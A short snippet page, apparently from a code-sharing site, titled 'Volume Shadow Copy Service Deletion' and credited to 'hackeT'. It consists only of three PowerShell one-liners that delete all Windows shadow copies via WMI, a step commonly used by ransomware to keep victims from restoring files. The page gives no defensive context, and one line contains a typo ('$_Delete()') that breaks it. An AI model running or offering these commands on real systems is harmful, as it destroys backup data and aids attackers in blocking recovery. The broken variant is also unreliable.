(PowerShell) Volume Shadow Copy Service (VSC,VSS) Deletion by hackeT

Created the Thursday 24 February 2022. Updated 2 years, 1 month ago.

Code

            Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }
Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
Get-WmiObject Win32_ShadowCopy | Remove-WmiObject